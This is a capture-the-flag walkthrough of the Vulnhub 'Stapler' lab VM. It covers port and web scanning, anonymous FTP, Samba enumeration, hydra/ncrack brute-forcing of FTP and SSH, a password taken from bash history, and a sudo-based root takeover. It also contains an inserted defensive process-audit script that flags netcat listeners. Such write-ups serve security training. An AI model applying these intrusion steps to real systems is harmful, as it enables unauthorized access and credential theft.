Vulnhub Stapler
Another day another machine
Let’s start with our nmap scan
nmap -sS -sC -A -Pn -T 4 -p- 192.168.1.124
While that is running let’s see if they have a website.
So we got a lot of ports open.
PORT STATE SERVICE VERSION
20/tcp closed ftp-data
21/tcp open ftp vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: Can't parse PASV response: "Permission denied."
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 81:21:ce:a1:1a:05:b1:69:4f:4d:ed:80:28:e8:99:05 (RSA)
|_ 256 5b:a5:bb:67:91:1a:51:c2:d3:21:da:c0:ca:f0:db:9e (ECDSA)
53/tcp open domain dnsmasq 2.75
| dns-nsid:
|_ bind.version: dnsmasq-2.75
80/tcp open http
123/tcp closed ntp
137/tcp closed netbios-ns
138/tcp closed netbios-dgm
139/tcp open netbios-ssn Samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP)
666/tcp open doom?
| fingerprint-strings:
| NULL:
|_ message2.jpgUT
3306/tcp open mysql MySQL 5.7.12-0ubuntu1
| mysql-info:
| Protocol: 10
| Version: 5.7.12-0ubuntu1
| Thread ID: 7
| Capabilities flags: 63487
| Some Capabilities: Support41Auth, Speaks41ProtocolOld, ODBCClient, LongPassword, ConnectWithDatabase, Speaks41ProtocolNew, IgnoreSigpipes, LongColumnFlag, SupportsLoadDataLocal, FoundRows, InteractiveClient, IgnoreSpaceBeforeParenthesis, SupportsTransactions, SupportsCompression, DontAllowDatabaseTableColumn, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
| Status: Autocommit
| Salt: 0sEX\x1FE*s(X\x1Ao)P]\x1EZ:h^
|_ Auth Plugin Name: 88
12380/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Tim, we need to-do better next year for Initech
We've got an open FTP server, Samba shares, a "doom?" port with a cryptic message, MySQL and another website besides the one on 80. Let's start with the website.
Website
If we browse the second website and look at the source code, there's a base64-encoded image. Let's decode that.
To decode it we simply take the base64 string of the image and paste it into a website like http://codebeautify.org/base64-to-image-converter
Alright…
I tried a Google reverse image search and got nothing. Let's look at the other stuff.
But apparently Zoe wants to hire people. And in the response headers there's
Dave: Soemthing doesn’t look right here.
Nikto
Let’s run nikto
nikto -h 192.168.1.124
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.1.124
+ Target Hostname: 192.168.1.124
+ Target Port: 80
+ Start Time: 2017-05-18 10:27:28 (GMT-4)
---------------------------------------------------------------------------
+ Server: No banner retrieved
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-3093: /.bashrc: User home dir was found with a shell rc file. This may reveal file and path information.
+ OSVDB-3093: /.profile: User home dir with a shell profile was found. May reveal directory information and system configuration.
+ ERROR: Error limit (20) reached for host, giving up. Last error: error reading HTTP response
+ Scan terminated: 20 error(s) and 5 item(s) reported on remote host
+ End Time: 2017-05-18 10:27:37 (GMT-4) (9 seconds)
---------------------------------------------------------------------------
Wait, what…? A .bashrc?
wget 192.168.1.124/.bashrc
wget 192.168.1.124/.profile
Alright, so we got some configuration files…? They don't seem to contain much; there's an alias called alert?
Now nikto on the other website
nikto -h 192.168.1.124:12380
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.1.124
+ Target Hostname: 192.168.1.124
+ Target Port: 12380
---------------------------------------------------------------------------
+ SSL Info: Subject: /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/[email protected]
Ciphers: ECDHE-RSA-AES256-GCM-SHA384
Issuer: /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/[email protected]
+ Start Time: 2017-05-18 11:12:26 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x15 0x5347c53a972d1
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'dave' found, with contents: Soemthing doesn't look right here
+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/admin112233/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/blogblog/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 2 entries which should be manually viewed.
+ Hostname '192.168.1.124' does not match certificate's names: Red.Initech
+ Allowed HTTP Methods: OPTIONS, GET, HEAD, POST
+ Uncommon header 'x-ob_mode' found, with contents: 1
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 7690 requests: 0 error(s) and 14 item(s) reported on remote host
+ End Time: 2017-05-18 11:14:13 (GMT-4) (107 seconds)
---------------------------------------------------------------------------
Interesting stuff. We got some folders there. I keep getting a 400 Bad Request for every folder that I'm trying to browse…
3 hours later… FUCK, I had to use https. This sucks. I had a low-privilege shell when I found out about the https.
Weird but let’s move on and see other stuff.
FTP
Let’s log on their ftp.
ftp 192.168.1.124
Connected to 192.168.1.124.
220-
220-|-----------------------------------------------------------------------------------------|
220-| Harry, make sure to update the banner when you get a chance to show who has access here |
220-|-----------------------------------------------------------------------------------------|
220-
220
Name (192.168.1.124:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 107 Jun 03 2016 note
226 Directory send OK.
ftp> get note
local: note remote: note
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note (107 bytes).
226 Transfer complete.
107 bytes received in 0.00 secs (90.2351 kB/s)
ftp> quit
221 Goodbye.
cat note
Elly, make sure you update the payload information. Leave it in your FTP account once your are done, John.
Ummm, alright Elly and John. Payload information.
Let's look up the version, vsftpd 2.0.8, in searchsploit
searchsploit vsftpd
-------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/platforms)
-------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------
vsftpd 2.0.5 - (CWD) Authenticated Remote Memory Consumption Exploit | ./linux/dos/5814.pl
vsftpd 2.3.2 - Denial of Service | ./linux/dos/16270.c
vsftpd 2.3.4 - Backdoor Command Execution | ./unix/remote/17491.rb
vsftpd FTP Server 2.0.5 - 'deny_file' Option Remote Denial of Service (1) | ./windows/dos/31818.sh
vsftpd FTP Server 2.0.5 - 'deny_file' Option Remote Denial of Service (2) | ./windows/dos/31819.pl
-------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------
Nothing matches our version, but I'm curious about 17491.rb:
This module exploits a malicious backdoor that was added to the VSFTPD download
archive. This backdoor was introdcued into the vsftpd-2.3.4.tar.gz archive between
June 30th 2011 and July 1st 2011 according to the most recent information
available. This backdoor was removed on July 3rd 2011.
So I guess that's that.
I let a hydra/ncrack run trying to brute-force it and got some hits.
Starting Ncrack 0.5 ( http://ncrack.org ) at 2017-05-18 14:13 EDT
Discovered credentials for ftp on 192.168.1.124 21/tcp:
192.168.1.124 21/tcp ftp: 'Drew' 'qwerty'
192.168.1.124 21/tcp ftp: 'MFrei' 'letmein'
192.168.1.124 21/tcp ftp: 'JBare' 'cookie'
Samba
We’ll run enum4linux on the machine
enum4linux 192.168.1.124
We got a few hits, let’s try logging into one of them
smbclient //192.168.1.124/kathy -a
WARNING: The "syslog" option is deprecated
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.9-Ubuntu]
smb: \> ls
. D 0 Fri Jun 3 12:52:52 2016
.. D 0 Mon Jun 6 17:39:56 2016
kathy_stuff D 0 Sun Jun 5 11:02:27 2016
backup D 0 Sun Jun 5 11:04:14 2016
19478204 blocks of size 1024. 16395444 blocks available
smb: \> cd backup
smb: \backup\> ls
. D 0 Sun Jun 5 11:04:14 2016
.. D 0 Fri Jun 3 12:52:52 2016
vsftpd.conf N 5961 Sun Jun 5 11:03:45 2016
wordpress-4.tar.gz N 6321767 Mon Apr 27 13:14:46 2015
19478204 blocks of size 1024. 16395444 blocks available
smb: \backup\> get vsftpd.conf
smb: \backup\> cd ..
smb: \> cd kathy_stuff
smb: \kathy_stuff\> ls
. D 0 Sun Jun 5 11:02:27 2016
.. D 0 Fri Jun 3 12:52:52 2016
todo-list.txt N 64 Sun Jun 5 11:02:27 2016
19478204 blocks of size 1024. 16395456 blocks available
smb: \kathy_stuff\> get todo-list.txt
So we took both files that looked interesting in the kathy share.
cat todo-list.txt
I'm making sure to backup anything important for Initech, Kathy
Alright, Kathy. Let's see what's in tmp.
smbclient //192.168.1.124/tmp
smb: \> ls
. D 0 Tue Jun 7 04:08:39 2016
.. D 0 Mon Jun 6 17:39:56 2016
ls N 274 Sun Jun 5 11:32:58 2016
19478204 blocks of size 1024. 16395452 blocks available
smb: \> get ls
cat ls
.:
total 12.0K
drwxrwxrwt 2 root root 4.0K Jun 5 16:32 .
drwxr-xr-x 16 root root 4.0K Jun 3 22:06 ..
-rw-r--r-- 1 root root 0 Jun 5 16:32 ls
drwx------ 3 root root 4.0K Jun 5 15:32 systemd-private-df2bff9b90164a2eadc490c0b8f76087-systemd-timesyncd.service-vFKoxJ
Alright…
Next
SSH
So when I used enum4linux, it gave us a list of users on the computer.
S-1-22-1-1000 Unix User\peter (Local User)
S-1-22-1-1001 Unix User\RNunemaker (Local User)
S-1-22-1-1002 Unix User\ETollefson (Local User)
S-1-22-1-1003 Unix User\DSwanger (Local User)
S-1-22-1-1004 Unix User\AParnell (Local User)
S-1-22-1-1005 Unix User\SHayslett (Local User)
S-1-22-1-1006 Unix User\MBassin (Local User)
S-1-22-1-1007 Unix User\JBare (Local User)
S-1-22-1-1008 Unix User\LSolum (Local User)
S-1-22-1-1009 Unix User\IChadwick (Local User)
S-1-22-1-1010 Unix User\MFrei (Local User)
S-1-22-1-1011 Unix User\SStroud (Local User)
S-1-22-1-1012 Unix User\CCeaser (Local User)
S-1-22-1-1013 Unix User\JKanode (Local User)
S-1-22-1-1014 Unix User\CJoo (Local User)
S-1-22-1-1015 Unix User\Eeth (Local User)
S-1-22-1-1016 Unix User\LSolum2 (Local User)
S-1-22-1-1017 Unix User\JLipps (Local User)
S-1-22-1-1018 Unix User\jamie (Local User)
S-1-22-1-1019 Unix User\Sam (Local User)
S-1-22-1-1020 Unix User\Drew (Local User)
S-1-22-1-1021 Unix User\jess (Local User)
S-1-22-1-1022 Unix User\SHAY (Local User)
S-1-22-1-1023 Unix User\Taylor (Local User)
S-1-22-1-1024 Unix User\mel (Local User)
S-1-22-1-1025 Unix User\kai (Local User)
S-1-22-1-1026 Unix User\zoe (Local User)
S-1-22-1-1027 Unix User\NATHAN (Local User)
S-1-22-1-1028 Unix User\www (Local User)
S-1-22-1-1029 Unix User\elly (Local User)
I decided to try to brute-force it with hydra.
I git-cloned https://github.com/danielmiessler/SecLists and used 500-worst-passwords.txt as the wordlist for my hydra attack.
I also created a username list file containing the usernames from enum4linux.
hydra -L ~/stapler/usernames.txt -P ~/wordlists/passwords/500-worst-passwords.txt 192.168.1.124 ssh
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...
[DATA] max 16 tasks per 1 server, overall 64 tasks, 14970 login tries (l:30/p:499), ~14 tries per task
[DATA] attacking service ssh on port 22
[STATUS] 242.00 tries/min, 242 tries in 00:01h, 14728 to do in 01:01h, 16 active
[STATUS] 222.33 tries/min, 667 tries in 00:03h, 14303 to do in 01:05h, 16 active
[STATUS] 214.29 tries/min, 1500 tries in 00:07h, 13470 to do in 01:03h, 16 active
[STATUS] 212.07 tries/min, 3181 tries in 00:15h, 11789 to do in 00:56h, 16 active
[22][ssh] host: 192.168.1.124 login: JBare password: cookie
[22][ssh] host: 192.168.1.124 login: MFrei password: letmein
15 minutes in we already had some hits; I tried both and they worked. We're in, boys!
Enumeration
We’re in the system, let’s start with uname
uname -a
Linux red.initech 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux
Searchsploit only shows an exploit for x64, and we've got x86.
I went to look at /etc/passwd and we can see that indeed there are a lot of users.
Let's look at the /home/ directory and at all the files in it
cd /home
find . | less
A quick peek at the result and we can see something very interesting
find . | grep sudo
./peter/.sudo_as_admin_successful
Peter can run sudo as admin.
Let's grep for the word peter in /home
grep -ri peter
grep: MFrei/.viminfo: Permission denied
grep: MFrei/.cache: Permission denied
grep: MFrei/.lesshst: Permission denied
grep: Drew/.cache: Permission denied
grep: peter/.viminfo: Permission denied
grep: peter/.bash_history: Permission denied
grep: peter/.cache: Permission denied
JKanode/.bash_history:sshpass -p JZQuyIN5 peter@localhost
That looks like a password.
su peter
It will ask you a bunch of questions because of the empty configuration file. Just answer them and you'll get a zsh shell.
/bin/bash
sudo passwd root
Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully
peter@red:/home$ su root
Password:
➜ /home id
uid=0(root) gid=0(root) groups=0(root)
➜ /home
And there it is.
Processes
Here's a step that I did but couldn't find a way to get root from. Let's look at all the processes
ps -aux | less
root 736 0.0 0.1 2244 1324 ? Ss May18 0:00 /usr/sbin/acpid
root 738 0.0 0.3 20352 3396 ? Ssl May18 0:00 /usr/bin/lxcfs /var/lib/lxcfs/
syslog 740 0.0 0.2 30728 2984 ? Ssl May18 0:03 /usr/sbin/rsyslogd -n
message+ 748 0.0 0.3 5932 3476 ? Ss May18 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation
root 758 0.0 0.2 4076 2780 ? Ss May18 0:00 /lib/systemd/systemd-logind
root 765 0.0 0.2 5576 2652 ? Ss May18 0:00 /usr/sbin/cron -f
daemon 770 0.0 0.1 3480 1924 ? Ss May18 0:00 /usr/sbin/atd -f
root 788 0.0 0.0 3132 128 ? Ss May18 0:00 /sbin/mdadm --monitor --pid-file /run/mdadm/monitor.pid --daemonise --scan --syslog
dnsmasq 801 0.0 0.2 9116 2628 ? S May18 0:00 /usr/sbin/dnsmasq -x /var/run/dnsmasq/dnsmasq.pid -u dnsmasq -7 /etc/dnsmasq.d,.dpkg-dist,.dpkg-old,.dpkg-new --local-service --trust-anchor=.,19036,8,2,49AAC11D7B6F6446702E54A1607371607A1A41855200FD2CE1CDDE32F24E8FB5
root 898 0.0 0.4 10104 4792 ? Ss May18 0:02 /usr/sbin/sshd -D
root 915 0.0 0.2 5308 2684 ? Ss May18 0:01 /usr/sbin/vsftpd /etc/vsftpd.conf
mysql 934 0.0 65.3 1228196 668788 ? Ssl May18 0:05 /usr/sbin/mysqld
root 936 0.0 0.0 2984 120 ? Ss May18 0:00 /sbin/iscsid
root 937 0.0 0.2 3444 2756 ? S<Ls May18 0:02 /sbin/iscsid
root 1047 0.0 0.1 2540 1564 ? S May18 0:00 /usr/sbin/inetutils-inetd
root 1083 0.0 2.2 127044 23052 ? Ss May18 0:00 php-fpm: master process (/etc/php/7.0/fpm/php-fpm.conf)
www-data 1108 0.0 0.5 127044 5500 ? S May18 0:00 php-fpm: pool www
www-data 1109 0.0 0.5 127044 5524 ? S May18 0:00 php-fpm: pool www
root 1110 0.0 2.4 127368 25000 ? Ss May18 0:00 /usr/sbin/apache2 -k start
root 1123 0.0 0.5 26228 5264 ? Ss May18 0:00 /usr/sbin/nmbd -D
root 1138 0.0 1.1 42308 11664 ? Ss May18 0:00 /usr/sbin/smbd -D
root 1139 0.0 0.4 40464 4464 ? S May18 0:00 /usr/sbin/smbd -D
root 1141 0.0 0.5 42308 5876 ? S May18 0:00 /usr/sbin/smbd -D
root 1283 0.0 0.0 6008 580 ? Ss May18 0:00 dhclient enp0s3
root 1308 0.0 0.2 34088 2312 ? Ss May18 0:00 /usr/lib/postfix/sbin/master
postfix 1310 0.0 0.2 34168 2456 ? S May18 0:00 qmgr -l -t unix -u
root 1328 0.0 0.2 5720 2892 ? S May18 0:00 /bin/bash /root/python.sh
root 1330 0.0 0.2 5724 2728 ? S May18 0:00 /bin/bash /usr/local/src/nc.sh
root 1332 0.0 0.3 6472 3228 ? S May18 0:00 su -c authbind php -S 0.0.0.0:80 -t /home/www/ &>/dev/null www
root 1342 0.0 0.3 6472 3200 ? S May18 0:00 su -c cd /home/JKanode; python2 -m SimpleHTTPServer 8888 &>/dev/null JKanode
root 1343 0.0 0.1 4748 1608 tty1 Ss+ May18 0:00 /sbin/agetty --noclear tty1 linux
JKanode 1348 0.0 0.3 6372 3864 ? Ss May18 0:00 /lib/systemd/systemd --user
www 1350 0.0 0.3 6368 3900 ? Ss May18 0:00 /lib/systemd/systemd --user
www 1356 0.0 0.1 7584 1264 ? S May18 0:00 (sd-pam)
JKanode 1362 0.0 0.1 7584 1264 ? S May18 0:00 (sd-pam)
www 1365 0.0 0.2 5432 2768 ? Ss May18 0:00 bash -c authbind php -S 0.0.0.0:80 -t /home/www/ &>/dev/null
JKanode 1366 0.0 0.2 5436 2832 ? Ss May18 0:00 bash -c cd /home/JKanode; python2 -m SimpleHTTPServer 8888 &>/dev/null
JKanode 1367 0.0 0.8 14696 8656 ? S May18 0:02 python2 -m SimpleHTTPServer 8888
www 1368 0.0 2.0 126124 21360 ? S May18 0:02 php -S 0.0.0.0:80 -t /home/www/
root 2641 0.0 1.0 42572 10516 ? S May18 0:00 /usr/sbin/smbd -D
root 2712 0.0 0.0 2692 692 ? S May18 0:00 nc -nlvp 666
root 3021 0.1 0.0 0 0 ? S May18 0:08 [kworker/u2:1]
postfix 3348 0.0 0.2 34116 3040 ? S May18 0:00 pickup -l -t unix -u -c
root 4553 0.0 0.0 0 0 ? S 00:43 0:00 [kworker/0:0]
root 5431 0.0 0.3 6476 3460 pts/0 S 00:51 0:00 su MFrei
MFrei 5432 0.0 0.3 5868 3432 pts/0 S 00:51 0:00 bash
root 6023 0.0 0.0 0 0 ? S 00:54 0:00 [kworker/u2:2]
A lot of good info.
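From the defender's side, the odd entries in that listing (root shells running scripts out of /root and /usr/local/src, a root-owned netcat listener, root using su -c to launch web servers whose document roots sit in home directories) are exactly what a process audit should flag. The following is an added example, not part of the original write-up: the rules are mine, and the sample rows are a constructed, whitespace-normalised subset of the ps output above.

```python
import re

# Constructed sample (a trimmed copy of the `ps aux` listing above, whitespace normalised).
PS_SAMPLE = """\
root  898  0.0 0.4  10104  4792 ? Ss  May18 0:02 /usr/sbin/sshd -D
root 1328  0.0 0.2   5720  2892 ? S   May18 0:00 /bin/bash /root/python.sh
root 1330  0.0 0.2   5724  2728 ? S   May18 0:00 /bin/bash /usr/local/src/nc.sh
root 1332  0.0 0.3   6472  3228 ? S   May18 0:00 su -c authbind php -S 0.0.0.0:80 -t /home/www/ &>/dev/null www
root 1342  0.0 0.3   6472  3200 ? S   May18 0:00 su -c cd /home/JKanode; python2 -m SimpleHTTPServer 8888 &>/dev/null JKanode
root 2712  0.0 0.0   2692   692 ? S   May18 0:00 nc -nlvp 666
www  1368  0.0 2.0 126124 21360 ? S   May18 0:02 php -S 0.0.0.0:80 -t /home/www/
"""

# Places a root-owned shell should not normally be executing scripts from.
ODD_SCRIPT_DIRS = ("/root/", "/usr/local/src/", "/tmp/", "/home/")
SHELL_SCRIPT = re.compile(r"^(?:/bin/)?(?:ba)?sh\s+(\S+)")          # "bash /path/to/script"
NC_CMD = re.compile(r"^(?:\S*/)?(?:nc|ncat|netcat)\s")               # netcat as the command

def parse_ps(text):
    """Split `ps aux` rows into (user, pid, command); skips the header and blank lines."""
    rows = []
    for line in text.splitlines():
        parts = line.split(None, 10)          # 10 fixed columns, then the command
        if len(parts) == 11 and parts[1].isdigit():
            rows.append((parts[0], int(parts[1]), parts[10]))
    return rows

def check_process(user, cmd):
    """Return the names of the rules a single process trips (empty list if none)."""
    hits = []
    m = SHELL_SCRIPT.match(cmd)
    if user == "root" and m and m.group(1).startswith(ODD_SCRIPT_DIRS):
        hits.append("root shell running script " + m.group(1))
    if NC_CMD.match(cmd) and re.search(r"\s-\w*l", cmd):              # -l / -nlvp: listen mode
        hits.append("netcat listener")
    if cmd.startswith("su -c ") and re.search(r"0\.0\.0\.0|SimpleHTTPServer", cmd):
        hits.append("root spawning a network service via su -c")
    if re.search(r"-t\s+/home/|cd\s+/home/", cmd):
        hits.append("web service rooted in a home directory")
    return hits

def audit(text):
    """Map pid -> findings for every flagged process in a `ps aux` dump."""
    findings = {}
    for user, pid, cmd in parse_ps(text):
        hits = check_process(user, cmd)
        if hits:
            findings[pid] = hits
    return findings

if __name__ == "__main__":
    for pid, hits in sorted(audit(PS_SAMPLE).items()):
        print(pid, "; ".join(hits))
```

Run against a real `ps aux` capture the same way; the rule list is deliberately short and should be tuned to what is normal on the host being audited.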
Port 666: I tried connecting to port 666 with ncat but couldn't figure out what it did. We can see here that the process is run by root, which is good info. If we follow the port we can see that it leads to python.sh, and the content of the file looks like
#!/bin/bash
while true; do
(nc -nlvp 666 < /usr/local/src/nc.zip &>/dev/null) && sleep 10s;
done
So it was sending us nc.zip… I went back to the Kali machine and got the file.
nc 192.168.1.124 666 > nc.zip
unzip nc.zip
It's a picture; it shows the contents of the file nc.txt that is located in the same folder, and it looks like it's nothing at all after all.
Decided to run strings/file/exiftool on the picture.
strings message2.jpg
JFIF
vPhotoshop 3.0
8BIM
1If you are reading this, you should get a cookie!
8BIM
Nothing, except that I get a cookie; exiftool and file turned up nothing good.
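The "Photoshop 3.0", "8BIM" and "1If you are reading this…" fragments that strings shows are the Photoshop image-resource segment (JPEG APP13) carrying an IPTC caption, and the leading "1" is its 0x31 = 49-byte length. Rather than eyeballing strings, that structure can be parsed directly. This is an added example, not code from the original post: it builds a constructed JPEG header with the same caption (the real message2.jpg is not included, and the picture data is omitted) and walks the APP13 segment to recover the text.

```python
import struct

# Constructed sample (not the file from the VM): a JPEG header whose APP13 "Photoshop 3.0"
# segment carries an IPTC caption in an 8BIM resource block; the picture data is omitted.
CAPTION = b"If you are reading this, you should get a cookie!"
IPTC = b"\x1c\x02\x78" + struct.pack(">H", len(CAPTION)) + CAPTION   # record 2, dataset 120
IRB = (b"8BIM" + b"\x04\x04" + b"\x00\x00"                              # id 0x0404, empty name
       + struct.pack(">I", len(IPTC)) + IPTC + b"\x00" * (len(IPTC) % 2))
APP13 = b"Photoshop 3.0\x00" + IRB
SAMPLE_JPEG = (b"\xff\xd8"                                               # SOI
               + b"\xff\xed" + struct.pack(">H", len(APP13) + 2) + APP13  # APP13 segment
               + b"\xff\xd9")                                            # EOI

def jpeg_segments(data):
    """Yield (marker, payload) for each header segment until SOS or EOI."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG")
    pos = 2
    while pos + 4 <= len(data) and data[pos] == 0xFF:
        marker = data[pos + 1]
        if marker in (0xD9, 0xDA):      # EOI / SOS: entropy-coded image data follows
            return
        length = struct.unpack(">H", data[pos + 2:pos + 4])[0]
        yield marker, data[pos + 4:pos + 2 + length]
        pos += 2 + length

def parse_irb(payload):
    """Parse the 8BIM resource blocks of an APP13 payload into {resource_id: bytes}."""
    head, out = b"Photoshop 3.0\x00", {}
    if not payload.startswith(head):
        return out
    pos = len(head)
    while payload[pos:pos + 4] == b"8BIM":
        rid = struct.unpack(">H", payload[pos + 4:pos + 6])[0]
        name_len = payload[pos + 6]
        pos += 7 + name_len + ((name_len + 1) % 2)    # Pascal name, padded to even length
        size = struct.unpack(">I", payload[pos:pos + 4])[0]
        out[rid] = payload[pos + 4:pos + 4 + size]
        pos += 4 + size + (size % 2)                  # data also padded to even length
    return out

def parse_iptc(data):
    """Parse IPTC-IIM datasets (0x1C, record, dataset, 2-byte length, value) into a dict."""
    pos, out = 0, {}
    while pos + 5 <= len(data) and data[pos] == 0x1C:
        length = struct.unpack(">H", data[pos + 3:pos + 5])[0]
        out[(data[pos + 1], data[pos + 2])] = data[pos + 5:pos + 5 + length]
        pos += 5 + length
    return out

def jpeg_caption(data):
    """Return the IPTC caption (record 2, dataset 120) from a JPEG's APP13 segment, or None."""
    for marker, payload in jpeg_segments(data):
        iptc = parse_irb(payload).get(0x0404) if marker == 0xED else None
        if iptc:
            text = parse_iptc(iptc).get((2, 120))
            if text is not None:
                return text.decode("latin-1")
    return None
```

Feed `jpeg_caption(open("message2.jpg", "rb").read())` a real file to pull the same field; extended (4-byte) IPTC lengths are not handled here.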